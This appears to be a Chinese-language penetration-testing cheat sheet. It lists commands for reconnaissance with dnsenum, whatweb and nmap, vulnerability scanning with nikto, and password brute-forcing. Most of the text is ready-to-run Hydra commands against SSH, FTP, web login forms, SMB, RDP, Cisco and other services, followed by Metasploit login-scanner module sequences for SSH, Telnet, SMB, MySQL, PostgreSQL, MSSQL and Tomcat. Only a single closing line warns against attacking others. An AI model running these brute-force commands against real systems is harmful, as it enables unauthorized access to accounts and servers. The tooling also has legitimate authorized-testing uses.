dnsenum -enum xxxxx.com 枚举出网站的所有域名和服务器的ip地址
打开百度查询ip地址的所在地
whatweb xxxx.com 查看那些网站入口可以访问 以状态码为准
whois ip地址 查看ip所在地
nmap -sS ip 匿名查看服务器开放的端口
nmap -O或-A 查看服务器的什么系统
nmap -sV 查看服务器开放端口以及服务器版本
[nikto]
漏洞扫描-T 选项包含了许多小选项,-T 9 表示扫描sql注入漏洞0检查文件上传页面1检查web日志2检查错误配置或默认文件3检查信息泄露问题4检查XSS/Script/Html问题5从根目录检查是否存在可访问的文件6检查拒绝服务器问题7从任意文件检索是否存在可访问文件8检查是否存在系统命令执行漏洞9检查sql注入漏洞b识别安装的软件版本c检查源代码泄露问题x反向链接选项
nikto -h ip 普通扫描全部漏洞
nikto -h -h ip -p 端口号 扫描指定端口漏洞
nikto -h ip -C all all表示CGI目录猜解
nikto -h ip -T 9 扫描sql注入漏洞
知道漏洞后开始爆破
[hydra(九头蛇)]
-l 指定爆破帐号-w 指定每个县城的回应时间为10-P 指定密码字典-t 指定爆破线程-v 指定现实爆破过程-f 查找到第一个可以使用的id和密码的时候停止破解hydra -l root -w 10 -P passwd.txt -t 10 -f ip地址 sshhydra -L /home/chenglee/zidian/user.txt -P /home/chenglee/zidian/wordlist.TXT 192.168.137.133 mysqlhydra -L user.txt -P pass.txt -V -t 10 ssh://192.168.0.1:22 暴力破解: 参数: -R 继续从上一次进度接着破解 -S 大写,采用SSL链接 -s 小写,可通过这个参数指定非默认端口 -l 指定破解的用户,对特定用户破解 -L 指定用户名字典 -p 小写,指定密码破解,少用,一般是采用密码字典 -P 大写,指定密码字典 -e 可选选项,n:空密码试探,s:使用指定用户和密码试探 -C 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数 -M 指定目标列表文件一行一条 -o 指定结果输出文件 -f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解 -t 同时运行的线程数,默认为16 -w 设置最大超时的时间,单位秒,默认是30s -v /-V显示详细过程 各协议的具体命令: 格式+示例:
1、破解ssh: hydra -L 用户名字典 -p 密码字典 -t 线程 -vV -e ns ip ssh hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh
2、破解ftp: hydra ip ftp -L 用户名字典 -P 密码字典 -t 线程(默认16) -vV hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV
3、get方式提交,破解web登录: hydra -L 用户名字典 -p 密码字典 -t 线程 -vV -e ns ip http-get/admin/ hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get/admin/index.PHP
4、post方式提交,破解web登录: hydra --L 用户名字典 -P 密码字典 -s 80 ip http-post-form"/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorrypassword" hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form"login.php:id=^USER^&passwd=^PASS^:
5、破解https: hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https 6、破解teamspeak: hydra -L 用户名字典 -P 密码字典 -s 端口号 -vV ip teamspeak 7、破解cisco: hydra -P pass.txt 10.36.16.18 cisco hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable 8、破解smb: hydra -L 用户名字典 -P pass.txt 10.36.16.18 smb 9、破解pop3: hydra -l muts -P pass.txt my.pop3.mail pop3 10、破解rdp: hydra ip rdp -l administrator -P pass.txt -V 11、破解http-proxy: hydra -l admin -P pass.txt http-proxy://10.36.16.18-------------------------------------------------------------------Kali Linux(Metasploit口令猜解模块)
Metasploit口令猜解模块——
SSH服务口令猜解:
msf > use auxiliary/scanner/ssh/ssh_login(使用ssh_login模块)
msf auxiliary(ssh_login) > show options (查看选项)
msf auxiliary(ssh_login) > set RHOSTS 10.107.0.99(目标)
msf auxiliary(ssh_login) > set USER_FILE /root/username.txt(用户名字典,或指定用户)
msf auxiliary(ssh_login) > set PASS_FILE /root/pass.txt(密码字典文件)
msf auxiliary(ssh_login) > set THREADS 50(线程)
msf auxiliary(ssh_login) > exploit (开始)
Telnet口令猜解:
msf > use auxiliary/scanner/telnet/telnet_login (使用telnet_login模块)
msf auxiliary(telnet_login) > show options (查看选项)
msf auxiliary(telnet_login) > set RHOSTS 10.180.100.141(目标)
msf auxiliary(telnet_login) > set USER_FILE /root/username.txt(用户名字典,或指定用户)
msf auxiliary(telnet_login) > set PASS_FILE /root/pass.txt(密码字典文件)
msf auxiliary(telnet_login) > exploit (开始)
Samba口令猜解:
msf > use auxiliary/scanner/smb/smb_login (使用smb_login模块)
msf auxiliary(smb_login) > show options (查看选项)
msf auxiliary(smb_login) > set RHOSTS 10.180.100.10(目标)
msf auxiliary(ssmb_login) > set USER_FILE /root/username.txt(用户名字典,或指定用户)
msf auxiliary(ssmb_login) > set PASS_FILE /root/pass.txt(密码字典文件)
msf auxiliary(ssmb_login) > exploit(开始)
Mysql口令猜解:
msf > use auxiliary/scanner/mysql/mysql_login (使用mysql_login模块)
msf auxiliary(mysql_login) > show options (查看选项)
msf auxiliary(mysql_login) > set RHOSTS 192.168.230.176(目标)
msf auxiliary(mysql_login) > set USERNAME root(用户名字典,或指定用户)
msf auxiliary(mysql_login) > set PASS_FILE /root/pass.txt(密码字典文件)
msf auxiliary(mysql_login) > exploit(开始)
Postgresq口令猜解:
msf > use auxiliary/scanner/postgres/postgres_login (使用postgres_login模块)
msf auxiliary(postgres_login) > show options (查看选项)
msf auxiliary(postgres_login) > set RHOSTS 192.168.230.10(目标)
msf auxiliary(postgres_login) > set USER_FILE /root/username.txt(用户名字典,或指定用户)
msf auxiliary(postgres_login) > set PASS_FILE /root/pass.txt(密码字典文件)
msf auxiliary(postgres_login) > exploit (开始)
Mssql口令猜解:
msf > use auxiliary/scanner/mssql/mssql_login (使用mssql_login 模块)
msf auxiliary(mssql_login) > show options (查看选项)
msf auxiliary(mssql_login) > set RHOSTS 10.107.0.64(目标)
msf auxiliary(mssql_login) > set USER_FILE /root/username.txt(用户名字典,或指定用户)
msf auxiliary(mssql_login) > set PASS_FILE /root/pass.txt(密码字典文件)
msf auxiliary(mssql_login) > exploit(开始)
Tomcat口令猜解:
msf > use auxiliary/scanner/http/tomcat_mgr_login (使用tomcat_mgr_login模块)
msf auxiliary(tomcat_mgr_login) > show options(查看选项)
msf auxiliary(tomcat_mgr_login) > set RHOSTS 192.168.230.176(目标)
msf auxiliary(tomcat_mgr_login) > set USER_FILE username.txt(用户名字典,或指定用户)
msf auxiliary(tomcat_mgr_login) > set PASS_FILE /root/pass.txt(密码字典文件)
msf auxiliary(tomcat_mgr_login) > exploit(开始)
hydra -l root -P /password.txt -vV -t 10 -f ip ssh
也可以写一个python脚本爆破
隆重声明注意自己的行为,不要搞别人,人外有人,天外有天!